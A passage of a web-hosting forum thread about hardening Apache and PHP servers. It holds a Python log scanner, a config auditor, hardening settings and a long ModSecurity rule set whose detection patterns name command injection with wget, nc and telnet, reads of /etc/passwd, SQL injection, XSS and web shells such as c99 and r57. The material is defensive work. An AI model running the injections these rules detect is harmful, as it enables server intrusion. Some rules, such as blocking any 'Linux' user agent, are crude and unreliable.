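    if TOOL_UA_RE.search(rec['ua']):
        reasons.append('scripted client user-agent')
    return reasons


def scan(lines):
    """Parse every line and keep the ones that classify() flags."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({
                'ip': rec['ip'],
                'path': rec['path'],
                'status': int(rec['status']),  # 200 means the script answered the probe
                'reasons': reasons,
            })
    return findings


def sources(findings):
    """Hits per source address: the list to take to the ISPs' abuse@ contacts."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:15} {f['status']} {f['path']}  {'; '.join(f['reasons'])}")
    print('per-source totals:', sources(hits))
```

    Matching on the decoded parameter value rather than on the raw request line is what makes the first and third samples (percent-encoded) come out the same as the second (plain); a 406 means the request was already refused, while a 200 on a flagged line is the one to investigate first.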

  2. #2

    Excellent Post

    We recently started receiving similar attacks.

    Excellent information! Many thanks!

    Thomas

  3. #3
    You're welcome. I am glad someone found my post useful.

  4. #4
    One thing I don't see mentioned, and you didn't specify a specific PHP5 minor version, so I am suggesting it here just in case.

    allow_url_fopen = Off in php.ini

    PHP 5.2 comes with another setting that probably protects things a little bit more:

    allow_url_include = Off (default is off)

    I turn this setting off on any server I am asked to secure. Yes it can cause some problems for _some_ php scripts, but most of them have been custom written applications, so I can get the developer to use curl functions instead.

    Turning this off will help out greatly, as it prevents most of the more common script kiddie tricks.

    I think mod_security is a nice idea, but implements things in the wrong method (reactive versus proactive -- think default deny), and I generally don't use it as I have seen a fair amount of false positives in production (for some more "generic" rule sets).

    One other thing I don't see you mention is turning off additional server information:

    ServerTokens Prod (in apache's httpd.conf)

    That turns off all the minor versions and other things that a hacker could use to specifically target your server. The less information you provide, the better.

    Other than those... an excellent write up with some great information.
    Last edited by ExpressColo-TomW; 02-10-2008 at 11:06 PM.
    ExpressHosting.net - Fast. Reliable. Affordable.
    Shared Hosting | Dedicated Servers | Colocation | Managed Cloud | AS53255
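    Item 5 of the first post ("check php for enable_dl, disable_functions, register_globals, open_basedir") and the allow_url_fopen, allow_url_include and ServerTokens settings in this reply are all "check the value" steps. As an added example, not code from any poster, the Python below reads php.ini- and httpd.conf-style text and reports which of those settings are missing or weak, with a constructed stock-looking configuration beside a hardened one. The setting names are the ones the thread uses (ServerSignature Off is taken from the next reply); the disable_functions list and the open_basedir path in the hardened sample are placeholders, and a setting that is absent is reported as a finding rather than guessing what the build default is.

```python
# Settings the thread says to check, with the value a hardened server should show.
# Names are compared case-insensitively; PHP booleans are normalised from the
# On/Off, 1/0, yes/no, true/false spellings php.ini accepts.
PHP_EXPECTED_OFF = (
    'allow_url_fopen',    # this reply
    'allow_url_include',  # this reply (PHP 5.2 and later)
    'register_globals',   # first post, item 5
    'enable_dl',          # first post, item 5
)
PHP_EXPECTED_NONEMPTY = ('disable_functions', 'open_basedir')  # first post, item 5

APACHE_EXPECTED = {
    'ServerTokens': 'Prod',    # this reply
    'ServerSignature': 'Off',  # next reply
}


def php_bool(value):
    """Map a php.ini boolean spelling to True/False; None if it is not one."""
    v = value.strip().strip('"\'').lower()
    if v in ('1', 'on', 'yes', 'true'):
        return True
    if v in ('', '0', 'off', 'no', 'false', 'none'):
        return False
    return None


def parse_ini(text):
    """Minimal php.ini reader: key = value, ';' comments, [sections] skipped, last entry wins."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('['):
            continue
        if '=' in line:
            key, value = line.split('=', 1)
            settings[key.strip().lower()] = value.strip()
    return settings


def parse_httpd_conf(text):
    """Directive name (lower-cased) -> argument string, '#' comments dropped, last entry wins."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            directives[parts[0].lower()] = parts[1].strip()
    return directives


def audit_php(ini_text):
    """List the php.ini findings; an empty list means every checked setting is as expected."""
    s = parse_ini(ini_text)
    problems = []
    for key in PHP_EXPECTED_OFF:
        if key not in s:
            # Not guessing the build default: an explicit Off is what we want to see.
            problems.append(f'{key}: not set, relying on the build default')
        elif php_bool(s[key]) is not False:
            problems.append(f'{key} = {s[key]!r}, expected Off')
    for key in PHP_EXPECTED_NONEMPTY:
        if not s.get(key, '').strip('"\''):
            problems.append(f'{key}: empty, no restriction in place')
    return problems


def audit_apache(conf_text):
    """List the httpd.conf findings for the two information-leak directives."""
    d = parse_httpd_conf(conf_text)
    problems = []
    for key, want in APACHE_EXPECTED.items():
        got = d.get(key.lower())
        if got is None:
            problems.append(f'{key}: not set')
        elif got.lower() != want.lower():
            problems.append(f'{key} {got}, expected {want}')
    return problems


# Constructed samples: a stock-looking configuration and the hardened version.
WEAK_INI = """\
; php.ini as shipped (constructed sample)
allow_url_fopen = On
register_globals = Off
enable_dl = On
disable_functions =
"""
HARDENED_INI = """\
; placeholder values for disable_functions and open_basedir
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
enable_dl = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
open_basedir = /home/:/tmp/
"""
WEAK_HTTPD = "ServerTokens Full\nServerSignature On\n"
HARDENED_HTTPD = "ServerSignature Off\nServerTokens Prod\n"

if __name__ == '__main__':
    for label, text in (('weak php.ini', WEAK_INI), ('hardened php.ini', HARDENED_INI)):
        print(label, audit_php(text) or 'OK')
    for label, text in (('weak httpd.conf', WEAK_HTTPD), ('hardened httpd.conf', HARDENED_HTTPD)):
        print(label, audit_apache(text) or 'OK')
```

    Run it against the real files (open('/usr/local/lib/php.ini').read() and the httpd.conf path for your build) after each PHP or Apache upgrade, since a package update can reintroduce the shipped defaults.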

  5. #5
    Yep.

    Forgot to mention those you stated.

    1) Edit your httpd.conf file and shut off server tokens.

    ServerSignature Off
    ServerTokens Prod
    The first one, ServerSignature Off, tells Apache not to display the server version on error pages or other pages it generates.

    The second one, ServerTokens Prod, tells Apache to return only "Apache" in the Server header, which is returned on every page request.

    Below is my updated Modsecurity2 config file. Please note that the user agent "Linux" is tagged as we get a lot of scrapers/hackers that use it. However, there are legitimate users that have Linux in their user agent field, so if you need to, comment it out.

    Example Linux Useragents:

    Code:
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040624 Galeon/1.3.15 (Debian package 1.3.15-3)
    Code:
    Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12

    Code:
    # Check Content-Length and reject all non numeric ones
    SecRule REQUEST_HEADERS:Content-Length "!^\d+$" "deny,log,auditlog,msg:'Content-Length HTTP header is not numeric', severity:'2',id:'960016'"
    
    # Do not accept GET or HEAD requests with bodies
    SecRule REQUEST_METHOD "^(GET|HEAD)$" "chain,deny,log,auditlog,msg:'GET or HEAD requests with bodies', severity:'2',id:'960011'"
    SecRule REQUEST_HEADERS:Content-Length "!^0?$"
    
    # Require Content-Length to be provided with every POST request.
    SecRule REQUEST_METHOD "^POST$" "chain,deny,log,auditlog,msg:'POST request must have a Content-Length header',id:'960012',severity:'4'"
    SecRule &REQUEST_HEADERS:Content-Length "@eq 0"
    
    # Don't accept transfer encodings we know we don't know how to handle
    SecRule HTTP_Transfer-Encoding "!^$" "deny,log,auditlog,msg:'ModSecurity does not support transfer encodings',id:'960013',severity:'5'"
    
    # Check decodings
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "@validateUrlEncoding" \
    	"chain, deny,log,auditlog,msg:'URL Encoding Abuse Attack Attempt',id:'950107',severity:'4'"
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\%(?![0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"
    
    # Proxy access attempt
    SecRule REQUEST_URI ^http:/ "deny,log,auditlog,msg:'Proxy access attempt', severity:'2',id:'960014'"
    
    #
    # Restrict type of characters sent
    SecRule REQUEST_FILENAME|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer \
    	"@validateByteRange 1-255" \
    	"log,auditlog,msg:'Request Missing an Accept Header', severity:'2',id:'960015',t:urlDecodeUni,phase:1"
    
    SecRule ARGS|ARGS_NAMES "@validateByteRange 1-255" \
    	"deny,log,auditlog,msg:'Invalid character in request',id:'960901',severity:'4',t:urlDecodeUni,phase:2"
    
    # allow request methods
    SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$" \
        "phase:1,log,auditlog,msg:'Method is not allowed by policy', severity:'2',id:'960032'"
    
    
    # Restrict file extension
    # removed exe so that frontpage will work
    
    # Restricted HTTP headers 
    SecRule REQUEST_HEADERS_NAMES "\.(?:Lock-Token|Translate|If)$" \
        "deny,log,auditlog,msg:'HTTP header is restricted by policy',id:'960038',severity:'4'"
    
    SecRule HTTP_User-Agent "(?:\b(?:m(?:ozilla\/4\.0 \(compatible\)|etis)|webtrends security analyzer|pmafind)\b|n(?:-stealth|sauditor|essus|ikto)|b(?:lack ?widow|rutus|ilbo)|(?:jaascoi|paro)s|internet explorer|webinspect|\.nasl)" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990002',severity:'2'"
    SecRule REQUEST_HEADERS_NAMES "\bacunetix-product\b" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990901',severity:'2'"
    SecRule REQUEST_FILENAME "^/nessustest" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990902',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:m(?:ozilla\/(?:4\.0 \(compatible; advanced email extractor|2\.0 \(compatible; newt activex; win32\))|ailto:craftbot\@yahoo\.com)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|siphon|wolf)|(?:collecto|irgrabbe)r|xtractorpro|o browse)|a(?:t(?:tache|hens)|utoemailspider|dsarobot)|w(?:eb(?:emailextrac| by mail)|3mir)|f(?:astlwspider|loodgate)|p(?:cbrowser|ackrat|surf)|(?:digout4uagen|takeou)t|(?:chinacla|be)[email protected]|rsync|shai|zeus)" \
            "deny,log,auditlog,msg:'Rogue web site crawler',id:'990012',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:\b(?:(?:indy librar|snoop)y|microsoft url control|lynx)\b|d(?:ownload demon|isco)|w(?:3mirror|get)|l(?:ibwww|wp)|p(?:avuk|erl)|cu(?:sto|rl)|big brother|autohttp|netants|eCatch)" \
            "chain,log,auditlog,msg:'Request Indicates an automated program explored the site',id:'990011',severity:'5'"
    SecRule REQUEST_HEADERS:User-Agent "!^apache.*perl"
    
    
    # Session fixation
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Session Fixation. Matched signature <%{TX.0}>',id:'950009',severity:'2'"
    
    # Blind SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql.user)|c(?:onstraint_type|harindex)|attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|(?:dba|mb)_users|xtype\W+\bchar|rownum)\b|t(?:able_name\b|extpos\W+\())" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950904',severity:'2'"        
    
    # SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebtask)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|e(?:xecresultset|numdsn)|(?:terminat|dirtre)e|availablemedia|loginconfig|cmdshell|filelist|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|group\b.*\bby\b.{1,100}?\bhaving|load\b\W*?\bdata\b.*\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction|open(?:rowset|query)|dbms_java)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|(?:having|or|and)\b\s+?(?:\d{1,10}|'[^=]{1,10}')\s*?[=<>]+|(?:print\]\b\W*?\@|root)\@|c(?:ast\b\W*?\(|oalesce\b))|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|'(?:s(?:qloledb|a)|msdasql|dbo)')" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950001',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:user_(?:(?:object|table|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|substr(?:ing)?|table_name|mb_users|rownum)\b" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950906',severity:'2'"
    
    # XSS
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack. Matched signature <%{TX.0}>',id:'950004',severity:'2'"
    
    # file injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Remote File Access Attempt. Matched signature <%{TX.0}>',id:'950005',severity:'2'"
    
    # Command access
    SecRule REQUEST_FILENAME "\b(?:n(?:map|et|c)|w(?:guest|sh)|cmd(?:32)?|telnet|rcmd|ftp)\.exe\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Access. Matched signature <%{TX.0}>',id:'950002',severity:'2'"
    
    # Command injection
    SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:(?:n(?:et(?:\b\W+?\blocalgroup|\.exe)|(?:map|c)\.exe)|t(?:racer(?:oute|t)|elnet\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\.exe|echo\b\W*?\by+)\b|c(?:md(?:(?:32)?\.exe\b|\b\W*?\/c)|d(?:\b\W*?[\\\/]|\W*?\.\.)|hmod.{0,40}?\+.{0,3}x))|[\;\|\`]\W*?\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\b|g(?:\+\+|cc\b))|\/(?:c(?:h(?:grp|mod|own|sh)|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|g(?:\+\+|cc)|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)(?:[\'\"\|\;\`\-\s]|$))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950006',severity:'2'"
    SecRule "ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent" \
            "\bwget\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950907',severity:'2'"
    
    # SSI injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'SSI injection Attack. Matched signature <%{TX.0}>',id:'950011',severity:'2'"
    
    # PHP injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open)|\$_(?:(?:pos|ge)t|session))\b|<\?(?!xml))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'PHP Injection Attack. Matched signature <%{TX.0}>',id:'950013',severity:'2'"
    
    #suntzu
    SecRule REQUEST_URI|REQUEST_BODY|HTTP_Content-Disposition "/(suntzu.*|suntzu)\.php\?cmd="
    
    #Known rootkits
    SecRule REQUEST_URI|REQUEST_BODY "perl (xpl\.pl|kut|viewde|httpd\.txt)"
    SecRule REQUEST_URI|REQUEST_BODY "\./xkernel\;"
    SecRule REQUEST_URI|REQUEST_BODY "/kaiten\.c"
    SecRule REQUEST_URI|REQUEST_BODY "/mampus\?&(cmd|command)"
    
    # WEB-MISC .htpasswd access
    SecRule REQUEST_URI  "\.htpasswd" 
    
    # WEB-MISC /etc/passwd access
    SecRule REQUEST_URI  "/etc/passwd"
    
    #Exploit agent
    SecRule HTTP_User-Agent "Mosiac 1\.*"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    # WEB-CGI formmail
    SecRule REQUEST_URI "/(formmail|mailform)(\x0a|\.pl\x0a)"
    
    #Invision Board ipchat.php file include
    SecRule REQUEST_URI "/hk/ipchat\.php*root_path*conf_global\.php"
    
    #Invision Power Board SQL injection
    SecRule REQUEST_URI "/hk/index\.php\?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT)"
    
    #Invision Gallery SQL Injection Vulnerabilities
    SecRule REQUEST_URI "/hk/index\.php" chain
    SecRule ARGS:comment "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)"
    
    
    # TIKIWIKI
    SecRule REQUEST_URI  "/tiki-map.phtml\?mapfile=\.\./\.\./"
    
    #Wordpress shell injection Vulnerability
    SecRule  REQUEST_URI "/cache/user.*/.*\.php\?cmd=" "id:390064,rev:1,severity:2,msg:'JITP: Wordpress shell injection Vulnerability'"
    
    #Bad agent
    SecRule HTTP_User-Agent "Brutus/AET"
    
    #Web leaches
    SecRule HTTP_User-Agent "Linux"
    SecRule HTTP_User-Agent "libcurl-agent"
    SecRule HTTP_User-Agent "TurnitinBot"
    SecRule HTTP_User-Agent "ANONYMOUS"
    SecRule HTTP_User-Agent "LinkWalker"
    SecRule HTTP_User-Agent "Drecombot"
    SecRule HTTP_User-Agent "Mac Finder"
    SecRule HTTP_User-Agent "ConveraCrawler"
    SecRule HTTP_User-Agent "WebarooBot"
    SecRule HTTP_User-Agent "RufusBot"
    SecRule HTTP_User-Agent "SumeetBot"
    SecRule HTTP_User-Agent "pulseBot"
    SecRule HTTP_User-Agent "FyberSpider"
    SecRule HTTP_User-Agent "1-More Scanner v1.25"
    SecRule HTTP_User-Agent "DRT-ResolveBot-Ignore"
    SecRule HTTP_User-Agent "T-H-U-N-D-E-R-S-T-O-N-E"
    SecRule HTTP_User-Agent "SnapPreviewBot"
    SecRule HTTP_User-Agent "IRLbot"
    SecRule HTTP_User-Agent "Charlotte"
    SecRule HTTP_User-Agent "ninetowns"
    SecRule HTTP_User-Agent "heritrix"
    SecRule HTTP_User-Agent "Python-urllib"
    SecRule HTTP_User-Agent "InetURL"
    SecRule HTTP_User-Agent "cazoodle"
    SecRule HTTP_User-Agent "DepSpid" "deny,nolog,status:410"
    SecRule HTTP_User-Agent "Browsezilla"
    SecRule HTTP_User-Agent "MetagerBot"
    SecRule HTTP_User-Agent "TALWinHttpClient"
    SecRule HTTP_User-Agent "Snapbot"
    SecRule HTTP_User-Agent "BDFetch"
    SecRule HTTP_User-Agent "WebaltBot"
    SecRule HTTP_User-Agent "VSynCrawler"
    SecRule HTTP_User-Agent "UbiCrawler"
    SecRule HTTP_User-Agent "WebCapture"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "FairAd Client"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Crescent"
    SecRule HTTP_User-Agent "MIIxpc"
    SecRule HTTP_User-Agent "Harvest"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "Snoopy"
    SecRule HTTP_User-Agent "IDBot"
    SecRule HTTP_User-Agent "Cyveillance" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "PEAR HTTP_Request class"
    SecRule HTTP_User-Agent "libwww-perl"
    SecRule HTTP_User-Agent "Exabot"
    SecRule HTTP_User-Agent "NeuralBot/0\.2"
    SecRule HTTP_User-Agent "Kenjin Spider"
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "grub-client"
    SecRule HTTP_User-Agent "Web Downloader"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebPix"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "Webster"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebRipper"
    SecRule HTTP_User-Agent "WebStripper"
    SecRule HTTP_User-Agent "WebReaper"
    SecRule HTTP_User-Agent "HTTrack"
    SecRule HTTP_User-Agent "furl"
    SecRule HTTP_User-Agent "blackspider"
    SecRule HTTP_User-Agent "teleport pro"
    SecRule HTTP_User-Agent "combine"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "larbin"
    SecRule HTTP_User-Agent "jakarta"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "SiteSnagger"
    SecRule HTTP_User-Agent "Schmozilla"
    SecRule HTTP_User-Agent "ProWebWalker"
    SecRule HTTP_User-Agent "LiteFinder"
    SecRule HTTP_User-Agent "CheeseBot"
    SecRule HTTP_User-Agent "Morfeus"
    SecRule HTTP_User-Agent "Teleport"
    SecRule HTTP_User-Agent "TMCrawler"
    SecRule HTTP_User-Agent "NetZIP"
    SecRule HTTP_User-Agent "Twiceler"
    SecRule HTTP_User-Agent "Nutscrape"
    SecRule HTTP_User-Agent "RedCarpet"
    SecRule HTTP_User-Agent "Nutch"
    SecRule HTTP_User-Agent "EmeraldShield.com"
    SecRule HTTP_User-Agent "Indy Library"
    SecRule HTTP_User-Agent "iCCrawler"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "Nessus"
    SecRule HTTP_User-Agent "BecomeBot"
    SecRule HTTP_User-Agent "DiamondBot"
    SecRule HTTP_User-Agent "IWAgent"
    SecRule HTTP_User-Agent "BrightCrawler"
    SecRule HTTP_User-Agent "ia_archiver" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "WWW-Mechanize"
    
    #some broken attack program
    SecRule REQUEST_URI|REQUEST_BODY "PUT /.*_@@RNDSTR@@"
    SecRule REQUEST_URI|REQUEST_BODY "soeasywebsite\.com"
    
    #bandwidth consumers
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "CopyGuard" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Picscout" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Digimarc WebReader" "deny,nolog,status:404"
    
    #spam bots
    SecRule HTTP_User-Agent  "DTS Agent"
    SecRule HTTP_User-Agent  "POE-Component-Client"
    SecRule HTTP_User-Agent  "WISEbot"
    SecRule HTTP_User-Agent  "^Shockwave Flash"
    SecRule HTTP_User-Agent  "Missigua"
    SecRule HTTP_User-Agent  "Java"
    
    #Gigablast
    SecRule HTTP_User-Agent "Gigabot" "deny,nolog,status:410"
    
    #e-mail collectors and spammers
    SecRule HTTP_User-Agent "WebBandit"
    SecRule HTTP_User-Agent "WEP Search 0"
    SecRule HTTP_User-Agent "Wells Search II"
    SecRule HTTP_User-Agent "psycheclone"
    SecRule HTTP_User-Agent "WEBMOLE"
    SecRule HTTP_User-Agent "Telesoft*"
    SecRule HTTP_User-Agent "WebEMailExtractor"
    SecRule HTTP_User-Agent "CherryPicker*"
    SecRule HTTP_User-Agent "NICErsPRO"
    SecRule HTTP_User-Agent "Advanced Email Extractor*"
    SecRule HTTP_User-Agent "EmailSiphon"
    SecRule HTTP_User-Agent "Extractorpro"
    SecRule HTTP_User-Agent "webbandit"
    SecRule HTTP_User-Agent "EmailCollector"
    SecRule HTTP_User-Agent "lwp-trivial"
    SecRule HTTP_User-Agent "WebEMailExtrac*"
    SecRule HTTP_User-Agent "EmailWolf"
    SecRule HTTP_User-Agent  "autoemailspider"
    SecRule HTTP_User-Agent  "EasyDL"
    SecRule HTTP_User-Agent  "ecollector"
    SecRule HTTP_User-Agent  "grub crawler"
    SecRule HTTP_User-Agent  "PycURL"
    SecRule HTTP_User-Agent  "DynaWeb"
    SecRule HTTP_User-Agent  "User-Agent"
    
    #
    SecRule HTTP_Referer|ARGS "brandimensions\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "Webclipping\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "cwrank\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "exevior\.com"
    SecRule HTTP_Referer|ARGS "netshaq\.com"
    SecRule HTTP_Referer|ARGS "xomreviews\.com"
    SecRule HTTP_Referer|ARGS "ufoseek\.com"
    SecRule HTTP_Referer|ARGS "everyfeed\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "mysubject\.com"
    SecRule HTTP_Referer|ARGS "internetserviceteam\.com"
    SecRule HTTP_Referer|ARGS "site\.com"
    
    # Email Injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "[\n\r]\s*(?:to|bcc|cc)\s*:.*?\@" \
            "t:none,t:lowercase,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Email Injection Attack. Matched signature <%{TX.0}>',id:'950019',severity:'2'"
    
    #new kit
    SecRule REQUEST_URI   "/c99shell\.txt"
    SecRule REQUEST_URI   "/c99\.txt\?"
    SecRule REQUEST_URI   "r0nin"
    SecRule REQUEST_URI   "m0rtix"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    #c99 rootshell
    SecRule REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"
    
    SecRule REQUEST_URI "/r57en\.php"
    
    #generic shell
    SecRule REQUEST_URI "shell\.txt"
    SecRule REQUEST_URI "test\.txt"
    
    #Forum shell rule
    SecRule REQUEST_URI "showtopic=http"
    
    #Known rootkit Defacing Tool 2.0
